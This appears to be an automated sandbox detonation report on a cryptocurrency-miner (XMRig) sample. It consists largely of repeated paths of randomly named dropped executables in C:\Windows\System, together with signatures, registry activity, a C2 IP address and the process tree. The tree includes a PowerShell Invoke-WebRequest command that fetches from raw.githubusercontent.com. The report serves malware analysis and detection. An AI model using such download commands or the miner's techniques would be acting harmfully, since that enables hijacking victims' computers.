C:\Windows\System\OoTIkpo.exe

C:\Windows\System\OoTIkpo.exe

C:\Windows\System\ebcyasP.exe

C:\Windows\System\ebcyasP.exe

C:\Windows\System\vooYVmH.exe

C:\Windows\System\vooYVmH.exe

C:\Windows\System\EzsOxIg.exe

C:\Windows\System\EzsOxIg.exe

C:\Windows\System\INBwEmr.exe

C:\Windows\System\INBwEmr.exe

C:\Windows\System\TDKPmIg.exe

C:\Windows\System\TDKPmIg.exe

C:\Windows\System\adZucJL.exe

C:\Windows\System\adZucJL.exe

C:\Windows\System\XRGIqId.exe

C:\Windows\System\XRGIqId.exe

C:\Windows\System\wLbpiIb.exe

C:\Windows\System\wLbpiIb.exe

C:\Windows\System\DRiIXjf.exe

C:\Windows\System\DRiIXjf.exe

C:\Windows\System\AvFLMft.exe

C:\Windows\System\AvFLMft.exe

C:\Windows\System\IPqxnxA.exe

C:\Windows\System\IPqxnxA.exe

C:\Windows\System\eormvpl.exe

C:\Windows\System\eormvpl.exe

C:\Windows\System\zODTHjN.exe

C:\Windows\System\zODTHjN.exe

C:\Windows\System\eQIqiJG.exe

C:\Windows\System\eQIqiJG.exe

C:\Windows\System\Rblmyji.exe

C:\Windows\System\Rblmyji.exe

C:\Windows\System\cZJobvO.exe

C:\Windows\System\cZJobvO.exe

C:\Windows\System\aDchKnl.exe

C:\Windows\System\aDchKnl.exe

C:\Windows\System\PinbVhD.exe

C:\Windows\System\PinbVhD.exe

C:\Windows\System\FJihhRL.exe

C:\Windows\System\FJihhRL.exe

C:\Windows\System\bKJupeE.exe

C:\Windows\System\bKJupeE.exe

C:\Windows\System\zavBRUz.exe

C:\Windows\System\zavBRUz.exe

C:\Windows\System\pgPtELE.exe

C:\Windows\System\pgPtELE.exe

C:\Windows\System\CCjhRWc.exe

C:\Windows\System\CCjhRWc.exe

C:\Windows\System\lgywJvv.exe

C:\Windows\System\lgywJvv.exe

C:\Windows\System\HiapOZj.exe

C:\Windows\System\HiapOZj.exe

C:\Windows\System\PYDmYoT.exe

C:\Windows\System\PYDmYoT.exe

C:\Windows\System\ZbvUzVJ.exe

C:\Windows\System\ZbvUzVJ.exe

C:\Windows\System\MpTshlQ.exe

C:\Windows\System\MpTshlQ.exe

C:\Windows\System\rOPvfrD.exe

C:\Windows\System\rOPvfrD.exe

C:\Windows\System\eNSJUrY.exe

C:\Windows\System\eNSJUrY.exe

C:\Windows\System\IUtfIaa.exe

C:\Windows\System\IUtfIaa.exe

C:\Windows\System\XyfZPHZ.exe

C:\Windows\System\XyfZPHZ.exe

C:\Windows\System\INUrLqj.exe

C:\Windows\System\INUrLqj.exe

C:\Windows\System\zxwPPjY.exe

C:\Windows\System\zxwPPjY.exe

C:\Windows\System\gWvOdKr.exe

C:\Windows\System\gWvOdKr.exe

C:\Windows\System\hScCfGn.exe

C:\Windows\System\hScCfGn.exe

C:\Windows\System\JdzgZrl.exe

C:\Windows\System\JdzgZrl.exe

C:\Windows\System\QBydKqs.exe

C:\Windows\System\QBydKqs.exe

C:\Windows\System\nNBpGZH.exe

C:\Windows\System\nNBpGZH.exe

C:\Windows\System\PLffZge.exe

C:\Windows\System\PLffZge.exe

C:\Windows\System\ekaQDIg.exe

C:\Windows\System\ekaQDIg.exe

C:\Windows\System\xQFvvUg.exe

C:\Windows\System\xQFvvUg.exe

C:\Windows\System\qWzkUhd.exe

C:\Windows\System\qWzkUhd.exe

C:\Windows\System\MAWoXOA.exe

C:\Windows\System\MAWoXOA.exe

C:\Windows\System\iOKZshB.exe

C:\Windows\System\iOKZshB.exe

C:\Windows\System\HPHyhUI.exe

C:\Windows\System\HPHyhUI.exe

C:\Windows\System\OfMegaK.exe

C:\Windows\System\OfMegaK.exe

C:\Windows\System\iRwdLYT.exe

C:\Windows\System\iRwdLYT.exe

C:\Windows\System\GMExwJj.exe

C:\Windows\System\GMExwJj.exe

C:\Windows\System\SaauDNz.exe

C:\Windows\System\SaauDNz.exe

C:\Windows\System\hbcRUPx.exe

C:\Windows\System\hbcRUPx.exe

C:\Windows\System\GhoyUco.exe

C:\Windows\System\GhoyUco.exe

C:\Windows\System\KUJXvdo.exe

C:\Windows\System\KUJXvdo.exe

C:\Windows\System\bMztwqY.exe

C:\Windows\System\bMztwqY.exe

C:\Windows\System\KRnrHEz.exe

C:\Windows\System\KRnrHEz.exe

C:\Windows\System\rVPVaCX.exe

C:\Windows\System\rVPVaCX.exe

C:\Windows\System\EbMrYNm.exe

C:\Windows\System\EbMrYNm.exe

C:\Windows\System\qQWMAiZ.exe

C:\Windows\System\qQWMAiZ.exe

C:\Windows\System\UznIboi.exe

C:\Windows\System\UznIboi.exe

C:\Windows\System\cwuAJGQ.exe

C:\Windows\System\cwuAJGQ.exe

C:\Windows\System\KISVGjs.exe

C:\Windows\System\KISVGjs.exe

C:\Windows\System\FBdWsNQ.exe

C:\Windows\System\FBdWsNQ.exe

C:\Windows\System\cZvumWK.exe

C:\Windows\System\cZvumWK.exe

C:\Windows\System\SfMkKeL.exe

C:\Windows\System\SfMkKeL.exe

C:\Windows\System\hQrdkPc.exe

C:\Windows\System\hQrdkPc.exe

C:\Windows\System\NXzTagc.exe

C:\Windows\System\NXzTagc.exe

C:\Windows\System\WoRustJ.exe

C:\Windows\System\WoRustJ.exe

C:\Windows\System\uBnZGxb.exe

C:\Windows\System\uBnZGxb.exe

C:\Windows\System\rhpjAwi.exe

C:\Windows\System\rhpjAwi.exe

C:\Windows\System\vOCGoIs.exe

C:\Windows\System\vOCGoIs.exe

C:\Windows\System\MouDjlZ.exe

C:\Windows\System\MouDjlZ.exe

C:\Windows\System\AIDjbUB.exe

C:\Windows\System\AIDjbUB.exe

C:\Windows\System\iZcsFyI.exe

C:\Windows\System\iZcsFyI.exe

C:\Windows\System\AeRpdJf.exe

C:\Windows\System\AeRpdJf.exe

C:\Windows\System\qYQgITK.exe

C:\Windows\System\qYQgITK.exe

C:\Windows\System\CkwOyuw.exe

C:\Windows\System\CkwOyuw.exe

C:\Windows\System\HHpNIDG.exe

C:\Windows\System\HHpNIDG.exe

C:\Windows\System\VGVZzlq.exe

C:\Windows\System\VGVZzlq.exe

C:\Windows\System\NaHcIlv.exe

C:\Windows\System\NaHcIlv.exe

C:\Windows\System\uVWqska.exe

C:\Windows\System\uVWqska.exe

C:\Windows\System\jXGHqcm.exe

C:\Windows\System\jXGHqcm.exe

C:\Windows\System\XgtkYHE.exe

C:\Windows\System\XgtkYHE.exe

C:\Windows\System\iWLCAJN.exe

C:\Windows\System\iWLCAJN.exe

C:\Windows\System\jaTAmcc.exe

C:\Windows\System\jaTAmcc.exe

C:\Windows\System\SeBePYI.exe

C:\Windows\System\SeBePYI.exe

C:\Windows\System\XJTNPnQ.exe

C:\Windows\System\XJTNPnQ.exe

C:\Windows\System\KmvNJmP.exe

C:\Windows\System\KmvNJmP.exe

C:\Windows\System\OVIvLbU.exe

C:\Windows\System\OVIvLbU.exe

C:\Windows\System\mkzzidb.exe

C:\Windows\System\mkzzidb.exe

C:\Windows\System\VYLGQPF.exe

C:\Windows\System\VYLGQPF.exe

C:\Windows\System\TZNrVPQ.exe

C:\Windows\System\TZNrVPQ.exe

C:\Windows\System\ywTfOLH.exe

C:\Windows\System\ywTfOLH.exe

C:\Windows\System\VgvCRGn.exe

C:\Windows\System\VgvCRGn.exe

C:\Windows\System\ovmcxvN.exe

C:\Windows\System\ovmcxvN.exe

C:\Windows\System\bBTIFRo.exe

C:\Windows\System\bBTIFRo.exe

C:\Windows\System\FSKXdmT.exe

C:\Windows\System\FSKXdmT.exe

C:\Windows\System\VOXLviB.exe

C:\Windows\System\VOXLviB.exe

C:\Windows\System\bWIwbHb.exe

C:\Windows\System\bWIwbHb.exe

C:\Windows\System\iaiuNbz.exe

C:\Windows\System\iaiuNbz.exe

C:\Windows\System\CwsqBkl.exe

C:\Windows\System\CwsqBkl.exe

C:\Windows\System\UULNfxU.exe

C:\Windows\System\UULNfxU.exe

C:\Windows\System\uKDKUKK.exe

C:\Windows\System\uKDKUKK.exe

C:\Windows\System\PJalWnt.exe

C:\Windows\System\PJalWnt.exe

C:\Windows\System\zXitzQw.exe

C:\Windows\System\zXitzQw.exe

C:\Windows\System\kduCKqw.exe

C:\Windows\System\kduCKqw.exe

C:\Windows\System\ZZcMttG.exe

C:\Windows\System\ZZcMttG.exe

C:\Windows\System\xjpgAIE.exe

C:\Windows\System\xjpgAIE.exe

C:\Windows\System\WczkQQZ.exe

C:\Windows\System\WczkQQZ.exe

C:\Windows\System\burzjVq.exe

C:\Windows\System\burzjVq.exe

C:\Windows\System\FXpMjEP.exe

C:\Windows\System\FXpMjEP.exe

C:\Windows\System\zlhcfoD.exe

C:\Windows\System\zlhcfoD.exe

C:\Windows\System\TeeYLjI.exe

C:\Windows\System\TeeYLjI.exe

C:\Windows\System\EUyUuLE.exe

C:\Windows\System\EUyUuLE.exe

C:\Windows\System\oMptuBS.exe

C:\Windows\System\oMptuBS.exe

C:\Windows\System\VXPFXKS.exe

C:\Windows\System\VXPFXKS.exe

C:\Windows\System\JnwWpFn.exe

C:\Windows\System\JnwWpFn.exe

C:\Windows\System\nZTmwbU.exe

C:\Windows\System\nZTmwbU.exe

C:\Windows\System\jFbNJMJ.exe

C:\Windows\System\jFbNJMJ.exe

C:\Windows\System\cSrKuqY.exe

C:\Windows\System\cSrKuqY.exe

C:\Windows\System\cNjcBxA.exe

C:\Windows\System\cNjcBxA.exe

C:\Windows\System\baGIxoF.exe

C:\Windows\System\baGIxoF.exe

C:\Windows\System\xIZkiRU.exe

C:\Windows\System\xIZkiRU.exe

C:\Windows\System\LiRRjry.exe

C:\Windows\System\LiRRjry.exe

C:\Windows\System\XnGwkRk.exe

C:\Windows\System\XnGwkRk.exe

C:\Windows\System\cwhQWTc.exe

C:\Windows\System\cwhQWTc.exe

C:\Windows\System\qWUYlcz.exe

C:\Windows\System\qWUYlcz.exe

C:\Windows\System\DBUrZRE.exe

C:\Windows\System\DBUrZRE.exe

C:\Windows\System\UcPcfnD.exe

C:\Windows\System\UcPcfnD.exe

C:\Windows\System\QBOVyYD.exe

C:\Windows\System\QBOVyYD.exe

C:\Windows\System\DVwuKeV.exe

C:\Windows\System\DVwuKeV.exe

C:\Windows\System\XmaAMpI.exe

C:\Windows\System\XmaAMpI.exe

C:\Windows\System\KllMEnN.exe

C:\Windows\System\KllMEnN.exe

C:\Windows\System\QWJmigw.exe

C:\Windows\System\QWJmigw.exe

C:\Windows\System\uMHEZZq.exe

C:\Windows\System\uMHEZZq.exe

C:\Windows\System\WWENbJw.exe

C:\Windows\System\WWENbJw.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp

Files


Analysis: behavioral2

Detonation Overview

Submitted

2024-05-27 06:01

Reported

2024-05-27 06:04

Platform

win10v2004-20240508-en

Max time kernel

134s

Max time network

118s

Command Line

"C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID C:\Windows\system32\dwm.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\system32\dwm.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\system32\dwm.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\system32\dwm.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\system32\dwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\system32\dwm.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: 33 N/A C:\Windows\system32\dwm.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\dwm.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\dwm.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target

Processes

C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\21a7ce4ca4590f2679057c0f26603b70_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "


C:\Windows\System\kYTuKWd.exe

C:\Windows\System\kYTuKWd.exe

C:\Windows\System\xDKWMok.exe

C:\Windows\System\xDKWMok.exe

C:\Windows\System\xRsXgIL.exe

C:\Windows\System\xRsXgIL.exe

C:\Windows\System\OIsTTJf.exe

C:\Windows\System\OIsTTJf.exe

C:\Windows\System\QIFsznY.exe

C:\Windows\System\QIFsznY.exe

C:\Windows\System\utGqYBX.exe

C:\Windows\System\utGqYBX.exe

C:\Windows\System\wypoxel.exe

C:\Windows\System\wypoxel.exe

C:\Windows\System\RgBKKaq.exe

C:\Windows\System\RgBKKaq.exe

C:\Windows\System\PeYFqwn.exe

C:\Windows\System\PeYFqwn.exe

C:\Windows\System\MxlgDEh.exe

C:\Windows\System\MxlgDEh.exe

C:\Windows\System\fECJiLC.exe

C:\Windows\System\fECJiLC.exe

C:\Windows\System\jywDIvt.exe

C:\Windows\System\jywDIvt.exe

C:\Windows\System\tlaRxsS.exe

C:\Windows\System\tlaRxsS.exe

C:\Windows\System\WZJNfNp.exe

C:\Windows\System\WZJNfNp.exe

C:\Windows\System\ZOmKXMl.exe

C:\Windows\System\ZOmKXMl.exe

C:\Windows\System\CsmbvKd.exe

C:\Windows\System\CsmbvKd.exe

C:\Windows\System\fZdKoZf.exe

C:\Windows\System\fZdKoZf.exe

C:\Windows\System\TPvlJeF.exe

C:\Windows\System\TPvlJeF.exe

C:\Windows\System\PGTlPMS.exe

C:\Windows\System\PGTlPMS.exe

C:\Windows\System\IfQenge.exe

C:\Windows\System\IfQenge.exe

C:\Windows\System\nHTKoZO.exe

C:\Windows\System\nHTKoZO.exe

C:\Windows\System\pmMRjOT.exe

C:\Windows\System\pmMRjOT.exe

C:\Windows\System\ZGhdmNc.exe

C:\Windows\System\ZGhdmNc.exe

C:\Windows\System\eHuWJQl.exe

C:\Windows\System\eHuWJQl.exe

C:\Windows\System\gXwDWYM.exe

C:\Windows\System\gXwDWYM.exe

C:\Windows\System\nITamfB.exe

C:\Windows\System\nITamfB.exe

C:\Windows\System\lOcqkTK.exe

C:\Windows\System\lOcqkTK.exe

C:\Windows\System\lzsoUyL.exe

C:\Windows\System\lzsoUyL.exe

C:\Windows\System\yZFYvMF.exe

C:\Windows\System\yZFYvMF.exe

C:\Windows\System\FvOorUS.exe

C:\Windows\System\FvOorUS.exe

C:\Windows\System\kpmgDyf.exe

C:\Windows\System\kpmgDyf.exe

C:\Windows\System\gDqrHYA.exe

C:\Windows\System\gDqrHYA.exe

C:\Windows\System\fvTuPOg.exe

C:\Windows\System\fvTuPOg.exe

C:\Windows\System\QzTeDKK.exe

C:\Windows\System\QzTeDKK.exe

C:\Windows\System\NVBfJMN.exe

C:\Windows\System\NVBfJMN.exe

C:\Windows\System\oBdGWDW.exe

C:\Windows\System\oBdGWDW.exe

C:\Windows\System\cnaWGTx.exe

C:\Windows\System\cnaWGTx.exe

C:\Windows\System\QLelgrj.exe

C:\Windows\System\QLelgrj.exe

C:\Windows\System\BsTaWPH.exe

C:\Windows\System\BsTaWPH.exe

C:\Windows\System\xdIopCt.exe

C:\Windows\System\xdIopCt.exe

C:\Windows\System\qKyBoro.exe

C:\Windows\System\qKyBoro.exe

C:\Windows\System\lUOizSh.exe

C:\Windows\System\lUOizSh.exe

C:\Windows\System\zgUewRL.exe

C:\Windows\System\zgUewRL.exe

C:\Windows\System\yWLhcDy.exe

C:\Windows\System\yWLhcDy.exe

C:\Windows\System\ZpDjaSO.exe

C:\Windows\System\ZpDjaSO.exe

C:\Windows\System\qZDFFfb.exe

C:\Windows\System\qZDFFfb.exe

C:\Windows\System\zlPWglv.exe

C:\Windows\System\zlPWglv.exe

C:\Windows\System\flPobmU.exe

C:\Windows\System\flPobmU.exe

C:\Windows\System\UxOnFSw.exe

C:\Windows\System\UxOnFSw.exe

C:\Windows\System\EXDodya.exe

C:\Windows\System\EXDodya.exe

C:\Windows\System\kuGMnvi.exe

C:\Windows\System\kuGMnvi.exe

C:\Windows\System\fYtjgAw.exe

C:\Windows\System\fYtjgAw.exe

C:\Windows\System\uZrJkJI.exe

C:\Windows\System\uZrJkJI.exe

C:\Windows\System\IQrgrVz.exe

C:\Windows\System\IQrgrVz.exe

C:\Windows\System\HAvQGcH.exe

C:\Windows\System\HAvQGcH.exe

C:\Windows\System\FvtdxcY.exe

C:\Windows\System\FvtdxcY.exe

C:\Windows\System\JslQHNN.exe

C:\Windows\System\JslQHNN.exe

C:\Windows\System\yPqrdiL.exe

C:\Windows\System\yPqrdiL.exe

C:\Windows\System\HzBafaW.exe

C:\Windows\System\HzBafaW.exe

C:\Windows\System\OwBDEDB.exe

C:\Windows\System\OwBDEDB.exe

C:\Windows\System\ezGaCUV.exe

C:\Windows\System\ezGaCUV.exe

C:\Windows\System\LKcWoSU.exe

C:\Windows\System\LKcWoSU.exe

C:\Windows\System\HVqNHRQ.exe

C:\Windows\System\HVqNHRQ.exe

C:\Windows\System\bomGlxa.exe

C:\Windows\System\bomGlxa.exe

C:\Windows\System\LJHAuCU.exe

C:\Windows\System\LJHAuCU.exe

C:\Windows\System\sMXMpFI.exe

C:\Windows\System\sMXMpFI.exe

C:\Windows\System\vFUHAsy.exe

C:\Windows\System\vFUHAsy.exe

C:\Windows\System\DPkIGRz.exe

C:\Windows\System\DPkIGRz.exe

C:\Windows\System\bcvwFIc.exe

C:\Windows\System\bcvwFIc.exe

C:\Windows\System\eVKqRwn.exe

C:\Windows\System\eVKqRwn.exe

C:\Windows\System\HpHgRrQ.exe

C:\Windows\System\HpHgRrQ.exe

C:\Windows\System\rnOuSQz.exe

C:\Windows\System\rnOuSQz.exe

C:\Windows\System\ImHIIAS.exe

C:\Windows\System\ImHIIAS.exe

C:\Windows\System\SZwUuQf.exe

C:\Windows\System\SZwUuQf.exe

C:\Windows\System\HcrfGJy.exe

C:\Windows\System\HcrfGJy.exe

C:\Windows\System\hmEcTSY.exe

C:\Windows\System\hmEcTSY.exe

C:\Windows\System\SNNtAGM.exe

C:\Windows\System\SNNtAGM.exe

C:\Windows\System\LWqkEWM.exe

C:\Windows\System\LWqkEWM.exe

C:\Windows\System\tptsCWf.exe

C:\Windows\System\tptsCWf.exe

C:\Windows\System\bVJFdYk.exe

C:\Windows\System\bVJFdYk.exe

C:\Windows\System\saVVbTL.exe

C:\Windows\System\saVVbTL.exe

C:\Windows\System\NrYCZkm.exe

C:\Windows\System\NrYCZkm.exe

C:\Windows\System\wJlqMij.exe

C:\Windows\System\wJlqMij.exe

C:\Windows\System\gCWgFfb.exe

C:\Windows\System\gCWgFfb.exe

C:\Windows\System\WjGCHMc.exe

C:\Windows\System\WjGCHMc.exe

C:\Windows\System\FQNjpVa.exe

C:\Windows\System\FQNjpVa.exe

C:\Windows\System\trpkvLW.exe

C:\Windows\System\trpkvLW.exe

C:\Windows\System\klJPWNs.exe

C:\Windows\System\klJPWNs.exe

C:\Windows\System\mncHAjc.exe

C:\Windows\System\mncHAjc.exe

C:\Windows\System\Srnhupd.exe

C:\Windows\System\Srnhupd.exe

C:\Windows\System\YWRnxSS.exe

C:\Windows\System\YWRnxSS.exe

C:\Windows\System\mrAlmvG.exe

C:\Windows\System\mrAlmvG.exe

C:\Windows\System\AeWBkgp.exe

C:\Windows\System\AeWBkgp.exe

C:\Windows\System\jcjSWfz.exe

C:\Windows\System\jcjSWfz.exe

C:\Windows\System\gEOvjjC.exe

C:\Windows\System\gEOvjjC.exe

C:\Windows\System\gfJAJnQ.exe

C:\Windows\System\gfJAJnQ.exe

C:\Windows\System\JqJCgke.exe

C:\Windows\System\JqJCgke.exe

C:\Windows\System\jrGryrm.exe

C:\Windows\System\jrGryrm.exe

C:\Windows\System\tdCFhqZ.exe

C:\Windows\System\tdCFhqZ.exe

C:\Windows\System\GQOLDTe.exe

C:\Windows\System\GQOLDTe.exe

C:\Windows\System\FAcMsOz.exe

C:\Windows\System\FAcMsOz.exe

C:\Windows\System\rdbsWxm.exe

C:\Windows\System\rdbsWxm.exe

C:\Windows\System\XdiOqUB.exe

C:\Windows\System\XdiOqUB.exe

C:\Windows\System\xpmStaA.exe

C:\Windows\System\xpmStaA.exe

C:\Windows\System\tCpUgYk.exe

C:\Windows\System\tCpUgYk.exe

C:\Windows\System\egJYJHR.exe

C:\Windows\System\egJYJHR.exe

C:\Windows\System\AwnTCjj.exe

C:\Windows\System\AwnTCjj.exe

C:\Windows\System\QUdobYf.exe

C:\Windows\System\QUdobYf.exe

C:\Windows\System\PMoiTwk.exe

C:\Windows\System\PMoiTwk.exe

C:\Windows\System\kaotIeW.exe

C:\Windows\System\kaotIeW.exe

C:\Windows\System\RfmdaDp.exe

C:\Windows\System\RfmdaDp.exe

C:\Windows\System\YdciqAv.exe

C:\Windows\System\YdciqAv.exe

C:\Windows\System\cckQlIr.exe

C:\Windows\System\cckQlIr.exe

C:\Windows\System\vvHPfAL.exe

C:\Windows\System\vvHPfAL.exe

C:\Windows\System\MuAqzHB.exe

C:\Windows\System\MuAqzHB.exe

C:\Windows\System\AIfqCUG.exe

C:\Windows\System\AIfqCUG.exe

C:\Windows\System\Ppzrnuo.exe

C:\Windows\System\Ppzrnuo.exe

C:\Windows\System\LYDBKrd.exe

C:\Windows\System\LYDBKrd.exe

C:\Windows\System\vnvebhP.exe

C:\Windows\System\vnvebhP.exe

C:\Windows\System\RWIzyDh.exe

C:\Windows\System\RWIzyDh.exe

C:\Windows\System\jhtNXVm.exe

C:\Windows\System\jhtNXVm.exe

C:\Windows\System\jjnUEiZ.exe

C:\Windows\System\jjnUEiZ.exe

C:\Windows\System\GtxWxtz.exe

C:\Windows\System\GtxWxtz.exe

C:\Windows\System\zyKCefr.exe

C:\Windows\System\zyKCefr.exe

C:\Windows\System\VmCmdle.exe

C:\Windows\System\VmCmdle.exe

C:\Windows\System\veFhiaT.exe

C:\Windows\System\veFhiaT.exe

C:\Windows\System\EQKlJfQ.exe

C:\Windows\System\EQKlJfQ.exe

C:\Windows\System\fTknzIu.exe

C:\Windows\System\fTknzIu.exe

C:\Windows\System\IuirTwM.exe

C:\Windows\System\IuirTwM.exe

C:\Windows\System\skZkFBX.exe

C:\Windows\System\skZkFBX.exe

C:\Windows\System\lSiXjAo.exe

C:\Windows\System\lSiXjAo.exe

C:\Windows\System\xSZKdGQ.exe

C:\Windows\System\xSZKdGQ.exe

C:\Windows\System\KPmvydw.exe

C:\Windows\System\KPmvydw.exe

C:\Windows\System\IiKXntN.exe

C:\Windows\System\IiKXntN.exe

C:\Windows\System\NgnmRKF.exe

C:\Windows\System\NgnmRKF.exe

C:\Windows\System\lUditng.exe

C:\Windows\System\lUditng.exe

C:\Windows\System\FWCMWyz.exe

C:\Windows\System\FWCMWyz.exe

C:\Windows\System\RasOfoR.exe

C:\Windows\System\RasOfoR.exe

C:\Windows\System\YLpkKLS.exe

C:\Windows\System\YLpkKLS.exe

C:\Windows\System\mXzSXWc.exe

C:\Windows\System\mXzSXWc.exe

C:\Windows\System\QXhzjwh.exe

C:\Windows\System\QXhzjwh.exe

C:\Windows\System\eYDUdBX.exe

C:\Windows\System\eYDUdBX.exe

C:\Windows\System\hfYcnSa.exe

C:\Windows\System\hfYcnSa.exe

C:\Windows\System\ZIRPFHr.exe

C:\Windows\System\ZIRPFHr.exe

C:\Windows\System\ULIknIM.exe

C:\Windows\System\ULIknIM.exe

C:\Windows\System\oWnRNmr.exe

C:\Windows\System\oWnRNmr.exe

C:\Windows\System\DioxjsL.exe

C:\Windows\System\DioxjsL.exe

C:\Windows\System\qacQpsl.exe

C:\Windows\System\qacQpsl.exe

C:\Windows\System\xhrslXq.exe

C:\Windows\System\xhrslXq.exe

C:\Windows\System\cvrSdLr.exe

C:\Windows\System\cvrSdLr.exe

C:\Windows\System\wsvwQKZ.exe

C:\Windows\System\wsvwQKZ.exe

C:\Windows\System\SRhqZaW.exe

C:\Windows\System\SRhqZaW.exe

C:\Windows\System\mggtyMS.exe

C:\Windows\System\mggtyMS.exe

C:\Windows\System\hIdUzXF.exe

C:\Windows\System\hIdUzXF.exe

C:\Windows\System\TPsLARb.exe

C:\Windows\System\TPsLARb.exe

C:\Windows\System\VAHfViP.exe

C:\Windows\System\VAHfViP.exe

C:\Windows\System\cQNcIty.exe

C:\Windows\System\cQNcIty.exe

C:\Windows\System\EEnNRAj.exe

C:\Windows\System\EEnNRAj.exe

C:\Windows\System\LgiMbKS.exe

C:\Windows\System\LgiMbKS.exe

C:\Windows\System\pIettes.exe

C:\Windows\System\pIettes.exe

C:\Windows\System\FmqwpRq.exe

C:\Windows\System\FmqwpRq.exe

C:\Windows\System\jicbvgd.exe

C:\Windows\System\jicbvgd.exe

C:\Windows\System\egMWfxq.exe

C:\Windows\System\egMWfxq.exe

C:\Windows\System\OTemRac.exe

C:\Windows\System\OTemRac.exe

C:\Windows\System\PwoAtJN.exe

C:\Windows\System\PwoAtJN.exe

C:\Windows\System\ZUJPNhC.exe

C:\Windows\System\ZUJPNhC.exe

C:\Windows\System\gagmvWB.exe

C:\Windows\System\gagmvWB.exe

C:\Windows\System\qnWzngy.exe

